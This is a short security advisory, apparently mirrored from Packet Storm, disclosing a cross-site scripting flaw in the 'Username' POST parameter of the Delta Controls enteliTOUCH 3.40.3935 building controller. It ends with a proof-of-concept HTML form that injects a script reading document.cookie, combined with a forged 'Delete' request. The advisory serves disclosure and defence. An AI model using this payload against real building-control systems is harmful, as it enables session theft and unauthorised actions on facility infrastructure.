Lucene search

packetstormLiquidWorm, zeroscience.mkPACKETSTORM:166728
HistoryApr 14, 2022 - 12:00 a.m.

Delta Controls enteliTOUCH 3.40.3935 Cross Site Scripting

`<!DOCTYPE html>  
<head><title>enteliTouch XSS</title></head>  
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)  
Vendor: Delta Controls Inc.  
Product web page:  
Affected version: 3.40.3935  
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant  
access to the heart of your BAS. The enteliTOUCH has a 7-inch,  
high-resolution display that serves as an interface to your building.  
Use it as your primary interface for smaller facilities or as an  
on-the-spot access point for larger systems. The intuitive,  
easy-to-navigate interface gives instant access to manage your BAS.  
Desc: Input passed to the POST parameter 'Username' is not properly  
sanitised before being returned to the user. This can be exploited  
to execute arbitrary HTML code in a user's browser session in context  
of an affected site.  
Tested on: DELTA enteliTOUCH  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2022-5703  
Advisory URL:  
<form action="" method="POST">  
<input type="hidden" name="userInfo" value="" />  
<input type="hidden" name="UL_SelectedOptionId" value="" />  
<input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />  
<input type="hidden" name="formAction" value="Delete" />  
<input type="submit" value="CSRF XSS Alert!" />